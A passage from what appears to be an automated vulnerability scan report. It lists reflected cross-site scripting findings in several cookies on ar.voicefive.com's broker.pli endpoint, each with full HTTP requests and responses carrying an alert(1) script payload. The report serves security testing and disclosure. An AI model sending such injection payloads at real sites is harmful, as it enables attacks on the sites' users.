User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=11146c<script>alert(1)</script>154e165be29; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:17 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '11146c<script>alert(1)</script>154e165be29', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.60. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 384b1<script>alert(1)</script>9c302d4a2ba was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:21 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
={ "ar_p97174789": 'exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "B
...[SNIP]...

5.61. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f1285<script>alert(1)</script>7568065879e was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:32 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741412; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
84742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.62. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload a6378<script>alert(1)</script>96b3feedbdd was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:29 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741409; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

5.63. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload dedf1<script>alert(1)</script>6a1a09355da was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Th
...[SNIP]...

5.64. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload d5a27<script>alert(1)</script>214694deac1 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:27 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741407; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

5.65. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload e2a7a<script>alert(1)</script>9043e21f1f9 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&e2a7a<script>alert(1)</script>9043e21f1f9=&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "a
...[SNIP]...

5.66. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9ba92<script>alert(1)</script>e69fd29fdd1 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=19ba92<script>alert(1)</script>e69fd29fdd1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Type: application/x-javascript
Connection: close
